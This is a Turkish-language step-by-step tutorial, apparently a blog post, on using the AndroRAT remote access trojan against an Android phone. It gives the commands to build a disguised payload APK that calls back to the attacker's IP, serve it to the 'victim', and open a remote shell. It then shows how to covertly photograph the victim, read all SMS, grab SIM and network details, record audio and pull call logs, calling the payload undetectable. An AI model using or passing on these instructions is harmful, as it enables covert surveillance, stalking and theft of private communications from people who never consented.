Bu aracı yükleyelim !!
Kurulum
Bu aracı android uygulamasından kontrol edebileceğinizi daha önce de söylediğimiz gibi, ancak bizim durumumuzda kali linux işletim sistemini seçeceğiz. Şimdi öncelikle github'dan git komutunu kullanarak bu aracı indireceğiz ve ardından dizine gideceğiz. Zaten kurulu “ pip ” aracına sahibiz, bu nedenle başarılı bir şekilde kurmak için son komutu uygulayacağız.1 2 3 | git clone https://github.com/karma9874/AndroRAT.git cd AndroRAT/ pip install colorama |
Bir yerde takılırsanız, eksik argümanları veya öznitelikleri kontrol etmek için help komutunu kullanabilirsiniz.
1 | python3 androRAT.py --help |
APK oluştur
Şimdi ilkimizi deneyeceğiz ve aşağıdaki komutu kullanarak payload oluşturmaya çalışacağız. Ama “ -i ” ve “ -p” yi kendinize göre değiştirin.1 | python3 androRAT.py --build -i 192.168.1.10 -p 4444 -o security.apk |
Paylaşmak
Gördüğünüz gibi payloadumuz hatasız bir şekilde başarıyla oluşturuldu ve payloadumuzu kurbanla paylaşmak için python dosya servisinden yardım alıyoruz.1 | python -m SimpleHTTPServer |
Yük Kurulumu
Artık her şey saldıran taraftan yapılıyor ve kurban yükü açar açmaz aşağıdaki resimdeki gibi görünecek. Ama bu gerçekten saptanamayan bir yük.Kurban akıllı telefonun kontrolünü ele alma zamanı geldi ve bu amaçla aşağıdaki komutu uygulamamız gerekiyor. Ama “- i ” ve “ -p ”yi kendinize göre değiştirin.
1 | python3 androRAT.py --shell -i 192.168.1.10 -p 4444 |
Uzak Kabuk
Gördüğünüz gibi kurban akıllı telefona başarıyla bağlandık. Ancak kurbanın akıllı telefonunu nasıl kontrol edeceğiniz konusunda hiçbir fikriniz yoksa yardım komutunu kullanın.Cihaz bilgisi
Aşağıdaki komutu çalıştırarak kurbanın android cihazının bilgilerini kontrol edebilirsiniz.1 | deviceInfo |
Kamera Listesi
Aşağıdaki komut size kurbanın telefonundan hangi kameradan fotoğraf çekmek istediğinizi soracaktır.1 2 | camList takepic 0 |
Gördüğünüz gibi resim, kurbanın telefonundan bilgisi dışında başarıyla tıklandı.
SMS
Benzer şekilde, aşağıdaki komutu uygulayarak kurbanın telefonunda saklanan tüm SMS'leri alabilirsiniz.1 | getSMS inbox |
Sonuçlar önünüzde.
Sim Ayrıntıları
Adli müfettişler için en kullanışlı özellik olarak, bu kolaylıklar sayesinde SIM kartla ilgili tüm detayları aktarabiliriz.1 | getSimDetails |
IP ve Mac Adresi
Gördüğünüz gibi kurbanın telefonunun IP ve MAC adresini aldık.Ses
Bir süre önce sese başladık ve şimdi ses kaydını durdurmak için takip komutunu uyguluyoruz.Gördüğünüz gibi kurbanı yaklaşık 3:34 dakikada dinledik.
Arama kayıtları
Bu, kurbanın telefonundan önceki tüm arama kaydı ayrıntılarını alabileceğimiz bu aracın en kullanışlı özelliğidir.Bitti !! Bu konuma gidebilir ve alınan tüm dosyaları açabilirsiniz.